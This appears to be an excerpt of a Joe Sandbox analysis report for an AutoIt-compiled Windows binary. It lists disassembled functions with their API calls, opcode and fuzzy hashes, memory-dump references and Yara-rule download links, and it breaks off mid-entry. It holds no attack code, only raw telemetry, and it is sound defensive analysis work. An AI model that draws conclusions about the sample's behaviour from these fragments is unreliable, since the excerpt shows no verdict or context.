Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 31c59f9e9dc275ec0b2511da46916e0566a2ece49b2bfd35aa078a9c3711e7e6
Instruction ID: b3697775154fc1a7b0f0d3f9375560bcedba09ce9a1069ec58119fe3e72bf2e8
Opcode Fuzzy Hash: 31c59f9e9dc275ec0b2511da46916e0566a2ece49b2bfd35aa078a9c3711e7e6
Instruction Fuzzy Hash: A0418266C1021875DB11EBF4898A9CFB7BCAF45710F508562E928E3122FB34E795C3A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00A0F953
ShowWindow.USER32(FFFFFFFF,00000006), ref: 00A4F3D1
ShowWindow.USER32(FFFFFFFF,000000FF), ref: 00A4F454

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: a3f987fbb3cabcf882b4ac2d007ddcbdc70ea7c5de6a8a8a4474c8c9f0c87317
Instruction ID: c0cff00e696f84667406bf07b4391057860180f6764d7f6bc3f153191ef70ac1
Opcode Fuzzy Hash: a3f987fbb3cabcf882b4ac2d007ddcbdc70ea7c5de6a8a8a4474c8c9f0c87317
Instruction Fuzzy Hash: BC414D35208684BEC738CF38FC88B2A7BA1ABC6360F14503DE05776DE1D631A881CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00A82D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A82D1B
GetDC.USER32(00000000), ref: 00A82D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A82D2E
ReleaseDC.USER32(00000000,00000000), ref: 00A82D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A82D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A82D87
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A82DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A82DE1

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: cf5d20de9bad2933f46632abec5898fcfdede146a538801fdba9a4d1b9d9db0e
Instruction ID: f2798782688ce3f34796bfb76dede656a6d358a39499249842b601b1775aa3d8
Opcode Fuzzy Hash: cf5d20de9bad2933f46632abec5898fcfdede146a538801fdba9a4d1b9d9db0e
Instruction Fuzzy Hash: 11318B72201214BBEB119F908C8AFFB3FA9EF09761F044065FE089A291D6799C41CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A55622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00A55637
_memcmp.LIBVCRUNTIME ref: 00A55659
_memcmp.LIBVCRUNTIME ref: 00A55671
_memcmp.LIBVCRUNTIME ref: 00A55684
_memcmp.LIBVCRUNTIME ref: 00A5569E
_memcmp.LIBVCRUNTIME ref: 00A556B1
_memcmp.LIBVCRUNTIME ref: 00A556C9
_memcmp.LIBVCRUNTIME ref: 00A556E4

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: df41f70cee6ea0de7884939a6eb8c6be6e81115f1c4a01241f8c70db97111398
Instruction ID: 724b9770c3f68bcfe2a86366be545b16bf01277d54488ef7ea58845cf5416ef4
Opcode Fuzzy Hash: df41f70cee6ea0de7884939a6eb8c6be6e81115f1c4a01241f8c70db97111398
Instruction Fuzzy Hash: 8121AAB1E41909BBD21466318EA2FFA335DBF24386F580420FE045E945F730EE1886A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A74FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00A75007
NULL Pointer assignment, xrefs: 00A7502E, 00A75383

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: aae360271a2e3643b8f5ed7d9a4c6db88337f5245b29b4243eb236f271b4245d
Instruction ID: 7f369ac136e3e1a6b761af1bc55be8ca4829f967cce6dccc5f8352382f6b6e1a
Opcode Fuzzy Hash: aae360271a2e3643b8f5ed7d9a4c6db88337f5245b29b4243eb236f271b4245d
Instruction Fuzzy Hash: 81D1B071E0060AAFDB10DFA8CC90BAEB7B5BF48344F14C569E919AB291D7B0DD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A31522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00A317FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00A315CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A31651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A317FB,?,00A317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A316E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A316FB

Part of subcall function 00A23820: RtlAllocateHeap.NTDLL(00000000,?,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6,?,009F1129), ref: 00A23852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00A317FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A31777
__freea.LIBCMT ref: 00A317A2
__freea.LIBCMT ref: 00A317AE

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: a430f6bd045ec0c5d89d4b5194b2c5551f1eb46c5f32eca6836bdbc59a0a653e
Instruction ID: 26558647009f570b0caf32021112cb912af0220103128ad5728d0e6323d7b85e
Opcode Fuzzy Hash: a430f6bd045ec0c5d89d4b5194b2c5551f1eb46c5f32eca6836bdbc59a0a653e
Instruction Fuzzy Hash: AD919272E002169FDF218FA4CD82AEEBBB5AF49710F184669F801E7241DB35DD41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A74523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A74648
VariantInit.OLEAUT32(?), ref: 00A74749
VariantClear.OLEAUT32(?), ref: 00A74753
VariantClear.OLEAUT32(?), ref: 00A747B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00A745D8, 00A74706, 00A747BE
Incorrect Object type in FOR..IN loop, xrefs: 00A7472C

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 1b26a9a008bdf3bd7bc3f93a3816a5dcecefe902aec93577de4b9452aed7c6ba
Instruction ID: 6b39c374f024b0bc7c99ffa79c4f6147c0cb57d5b494369b65de150a971ad9ed
Opcode Fuzzy Hash: 1b26a9a008bdf3bd7bc3f93a3816a5dcecefe902aec93577de4b9452aed7c6ba
Instruction Fuzzy Hash: 99916F71A00219ABDF24CFA4DC84FAEBBB8AF49714F10C559F519AB281D7709941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A61187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00A6125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A61284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00A612A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A612D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A6135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A613C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A61430

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 791f47b3dc6537d55c8ed888179935ca8e4fd571c8f69facb1ac5b92cc02b848
Instruction ID: 14ea861c42b6fb734f5ed277f51474a0197d78054f090152d485e10c59063c33
Opcode Fuzzy Hash: 791f47b3dc6537d55c8ed888179935ca8e4fd571c8f69facb1ac5b92cc02b848
Instruction Fuzzy Hash: 6E9106B5A002099FDB00DFA8D899BFEBBB5FF45325F184029E511EB291DB74E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A0948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 1ea57b36f1edff3f5a2e006bc582ca2bbbd96227507b33e451fbdaa96adb0a02
Instruction ID: b906845fcc2157d51a4d3a8a5fdbbe4d2e8f045a34d223d3259d994616175e93
Opcode Fuzzy Hash: 1ea57b36f1edff3f5a2e006bc582ca2bbbd96227507b33e451fbdaa96adb0a02
Instruction Fuzzy Hash: 4B912671D40219EFCB10CFA9DC84AEEBBB8FF89320F148555E515B7292D375AA42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A73947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A7396B
CharUpperBuffW.USER32(?,?), ref: 00A73A7A
_wcslen.LIBCMT ref: 00A73A8A
VariantClear.OLEAUT32(?), ref: 00A73C1F

Part of subcall function 00A60CDF: VariantInit.OLEAUT32(00000000), ref: 00A60D1F
Part of subcall function 00A60CDF: VariantCopy.OLEAUT32(?,?), ref: 00A60D28
Part of subcall function 00A60CDF: VariantClear.OLEAUT32(?), ref: 00A60D34

Strings

Incorrect Parameter format, xrefs: 00A739A6, 00A73BA1
AUTOIT.ERROR, xrefs: 00A73A80, 00A73A85

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: f02f06f7780c9119b5ac600ba4d63eddd31f148e9529785638f4c07aeed38245
Instruction ID: 578867d5d4ae8c8324765eb22c4aac9d46a700ac40ef4aaae1118bb857824a06
Opcode Fuzzy Hash: f02f06f7780c9119b5ac600ba4d63eddd31f148e9529785638f4c07aeed38245
Instruction Fuzzy Hash: FC9177766083059FCB00EF24C98196AB7E4FF88314F04886DF98A9B351DB31EE45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A74BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00A5000E: CLSIDFromProgID.OLE32 ref: 00A5002B
Part of subcall function 00A5000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 00A50046
Part of subcall function 00A5000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A4FF41,80070057,?,?), ref: 00A50054
Part of subcall function 00A5000E: CoTaskMemFree.OLE32(00000000), ref: 00A50064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00A74C51
_wcslen.LIBCMT ref: 00A74D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A74DCF
CoTaskMemFree.OLE32(?), ref: 00A74DDA

Strings

NULL Pointer assignment, xrefs: 00A74E23, 00A74E52

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: a9f7693c71f013f35b83e44466c30a738432206c234c452003e99c769cbf2524
Instruction ID: 7348984fc10076c9f87d22ae2972fe654d46d6e94dbdd9162c0ab1edc3e67741
Opcode Fuzzy Hash: a9f7693c71f013f35b83e44466c30a738432206c234c452003e99c769cbf2524
Instruction Fuzzy Hash: CF912671D0021DAFDF14DFA4CC91AEEB7B8BF48310F10816AE919A7291EB709A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A820FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32 ref: 00A82183
GetMenuItemCount.USER32(00000000), ref: 00A821B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A821DD
_wcslen.LIBCMT ref: 00A82213
GetMenuItemID.USER32(?,?), ref: 00A8224D
GetSubMenu.USER32 ref: 00A8225B

Part of subcall function 00A53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A53A57
Part of subcall function 00A53A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00A525B3), ref: 00A53A5E
Part of subcall function 00A53A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00A53A65

PostMessageW.USER32 ref: 00A822E3

Part of subcall function 00A5E97B: Sleep.KERNEL32 ref: 00A5E9F3

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: be0b51cc07217ac765655c3eb3e4cbd5c0af1bdb4885663df68f2f1f021ae019
Instruction ID: 6ed1cba6b83f0ff72be559f0f7e2e800fa178fe633d8f614d9c91675d6b82684
Opcode Fuzzy Hash: be0b51cc07217ac765655c3eb3e4cbd5c0af1bdb4885663df68f2f1f021ae019
Instruction Fuzzy Hash: 7E713E75A00215AFCB14EFA4C945BBEB7F5EF88320F148469E916EB351D734AD418F90

Uniqueness

Uniqueness Score: -1.00%

Function 00A5AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00A5AEF9
GetKeyboardState.USER32(?), ref: 00A5AF0E
SetKeyboardState.USER32(?), ref: 00A5AF6F
PostMessageW.USER32 ref: 00A5AF9D
PostMessageW.USER32 ref: 00A5AFBC
PostMessageW.USER32 ref: 00A5AFFD
PostMessageW.USER32 ref: 00A5B020

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 3a24f5911ffcf3602692ae5192ecf097eb3c256fd917d940695e32fee9774153
Instruction ID: 45f2c76f5ac927f964dd306403748e95b518f5a1aa7ed06ddd8e67ed4232a414
Opcode Fuzzy Hash: 3a24f5911ffcf3602692ae5192ecf097eb3c256fd917d940695e32fee9774153
Instruction Fuzzy Hash: E051D3A06147D53DFB3683348C45BBABEA96B06306F088589F9D9558C2D3B8ACCCD761

Uniqueness

Uniqueness Score: -1.00%

Function 00A5ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00A5AD19
GetKeyboardState.USER32(?), ref: 00A5AD2E
SetKeyboardState.USER32(?), ref: 00A5AD8F
PostMessageW.USER32 ref: 00A5ADBB
PostMessageW.USER32 ref: 00A5ADD8
PostMessageW.USER32 ref: 00A5AE17
PostMessageW.USER32 ref: 00A5AE38

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 98527e03965eea216381ea70509b768108030ab60784816be4a2711380e526ec
Instruction ID: 801176413513faaa1c0642ade038a0ac7a240e49295f26ea483650e08ab13c13
Opcode Fuzzy Hash: 98527e03965eea216381ea70509b768108030ab60784816be4a2711380e526ec
Instruction Fuzzy Hash: 6451E9A17047E53DFB3293348C46B7ABEA87B55302F088649E9D5568C2D3B4EC8CD762

Uniqueness

Uniqueness Score: -1.00%

Function 00A2542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 00A25470
__fassign.LIBCMT ref: 00A254EB
__fassign.LIBCMT ref: 00A25506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00A33CD6,00000005,00000000,00000000), ref: 00A2552C
WriteFile.KERNEL32(?,00A33CD6,00000000,00A25BA3,00000000), ref: 00A2554B
WriteFile.KERNEL32(?,?,00000001,00A25BA3,00000000), ref: 00A25584

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 565675f2bbb84b3233401c0d4fd91036c133aa371427d38be1a3e39ec1cba3df
Instruction ID: 037ea074bc1ec6730d791a38237a36d43454205b606b818e1f6f36165cb34009
Opcode Fuzzy Hash: 565675f2bbb84b3233401c0d4fd91036c133aa371427d38be1a3e39ec1cba3df
Instruction Fuzzy Hash: 3351BE71E00619AFDB10CFACE885AEEBBF9FF09311F14452AF955E7291D6309A41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A12D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A12D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00A12D53
_ValidateLocalCookies.LIBCMT ref: 00A12DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00A12E0C
_ValidateLocalCookies.LIBCMT ref: 00A12E61

Strings

csm, xrefs: 00A12DF6

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f0aa70341f08a8c88c772667e2ccde7e1c8a6e11d15d96a2d6aed5ff77f2f09b
Instruction ID: 1053b19bee6aa63e1c71091107b844a58c9b9004181ca6db38e876f537f3e0a2
Opcode Fuzzy Hash: f0aa70341f08a8c88c772667e2ccde7e1c8a6e11d15d96a2d6aed5ff77f2f09b
Instruction Fuzzy Hash: CF41AF34A00209AFCF10DF68D845BDEBBB5BF45324F148155E914AB392D731EAA6CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00A710B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A7307A
Part of subcall function 00A7304E: _wcslen.LIBCMT ref: 00A7309B

